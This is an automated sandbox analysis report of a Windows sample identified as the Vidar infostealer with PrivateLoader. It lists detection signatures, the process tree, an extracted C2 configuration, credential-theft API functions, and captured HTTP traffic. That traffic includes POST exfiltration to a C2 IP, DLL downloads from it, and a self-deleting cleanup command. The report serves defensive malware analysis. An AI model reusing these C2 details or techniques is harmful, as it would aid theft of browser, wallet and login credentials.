Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1440170
MD5: 43b0461d2e1c77a8530d66d3e1ae0175
SHA1: 96c50c5b2d652a572e18147e213e8bea38118f94
SHA256: d4536f1b7e5fbfdfe66be6a404147230dcff7728bc559b493d7bdd8e1adaea08
Tags: exe
Infos:

Detection

PrivateLoader, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected AntiVM3
Yara detected PrivateLoader
Yara detected Vidar
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Opens network shares
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 2520 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 43B0461D2E1C77A8530D66D3E1AE0175)
    • conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 2832 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • cmd.exe (PID: 7700 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BGDAAKJJDAAK" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 7756 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199681720597"], "Botnet": "681a223bec180ebfdc48547d3d5bd784", "Version": "9.6"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |

Source | Rule | Description | Author | Strings
C:\ProgramData\BGDAAKJJDAAK\vcruntime140.dll | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security |

Source | Rule | Description | Author | Strings
00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen | 0x221f0:$s1: JohnDoe; 0x32f80:$s1: JohnDoe; 0x221e8:$s2: HAL9TH
00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
2.2.RegAsm.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
2.2.RegAsm.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen | 0x20ff0:$s1: JohnDoe; 0x20fe8:$s2: HAL9TH
2.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
2.2.RegAsm.exe.400000.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen | 0x221f0:$s1: JohnDoe; 0x32f80:$s1: JohnDoe; 0x221e8:$s2: HAL9TH
0.2.file.exe.630000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
                      No Sigma rule has matched
                      No Snort rule has matched

                      AV Detection

                      Source: file.exeAvira: detected
                      Source: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199681720597"], "Botnet": "681a223bec180ebfdc48547d3d5bd784", "Version": "9.6"}
                      Source: https://65.109.242.112 Virustotal: Detection: 11%
                      Source: https://65.109.242.112/ Virustotal: Detection: 11%
                      Source: https://65.109.242.112/sqlx.dll Virustotal: Detection: 10%
                      Source: https://65.109.242.112/# Virustotal: Detection: 11%
                      Source: file.exeJoe Sandbox ML: detected
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004062F8 CryptUnprotectData,LocalAlloc,LocalFree,2_2_004062F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410D92 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,2_2_00410D92
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00406295 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_00406295
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00408331 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,PK11_FreeSlot,lstrcat,2_2_00408331
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402484 memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,2_2_00402484
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C95A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,2_2_6C95A9A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9544C0 PK11_PubEncrypt,2_2_6C9544C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C924420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,2_2_6C924420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C954440 PK11_PrivDecrypt,2_2_6C954440
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9A25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,2_2_6C9A25B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C93E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,2_2_6C93E6E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C95A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,2_2_6C95A650
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C938670 PK11_ExportEncryptedPrivKeyInfo,2_2_6C938670
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C97A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,2_2_6C97A730
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C980180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,2_2_6C980180
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9543B0 PK11_PubEncryptPKCS1,PR_SetError,2_2_6C9543B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C977C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,2_2_6C977C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C97BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,2_2_6C97BD30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C937D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,2_2_6C937D60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C979EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,2_2_6C979EC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C953FF0 PK11_PrivDecryptPKCS1,2_2_6C953FF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C953850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,2_2_6C953850
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C959840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,2_2_6C959840
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 23.195.238.96:443 -> 192.168.2.4:49730 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 65.109.242.112:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2178967195.000000006F90D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                      Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                      Source: Binary string: C:\na3eg3m\First.pdb source: file.exe
                      Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                      Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                      Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
                      Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                      Source: Binary string: C:\na3eg3m\First.pdb% source: file.exe
                      Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2178967195.000000006F90D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                      Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.dr
                      Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr

                      Spreading

                      Source: Yara matchFile source: C:\ProgramData\BGDAAKJJDAAK\vcruntime140.dll, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll, type: DROPPED
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006CF963 FindFirstFileExW,0_2_006CF963
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006CFE47 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_006CFE47
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401162
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004163B3 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_004163B3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004154FA _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,2_2_004154FA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B4B6 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040B4B6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409538 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00409538
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C6CD _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040C6CD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415BC6 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_00415BC6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409FC5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_00409FC5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409953 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00409953
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A9D4 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040A9D4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415F6A _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,2_2_00415F6A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415947 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,2_2_00415947
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                      Networking

                      Source: Yara matchFile source: C:\ProgramData\BGDAAKJJDAAK\vcruntime140.dll, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll, type: DROPPED
                      Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199681720597
                      Source: global trafficHTTP traffic detected: GET /profiles/76561199681720597 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 23.195.238.96 23.195.238.96
                      Source: Joe Sandbox ViewIP Address: 65.109.242.112 65.109.242.112
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBKFHIJKJKECAAAECAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFHCGHJDBFIIDGDHIJDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFHIJDHDGDBFHIEHDGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGCBGCAFIIECBFIDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 7109Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /sqlx.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFHCGHJDBFIIDGDHIJDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBAFCBKFIDGCAKKKFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAAAFBKFIECAAKECGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0Host: 65.109.242.112Cache-Control: no-cache
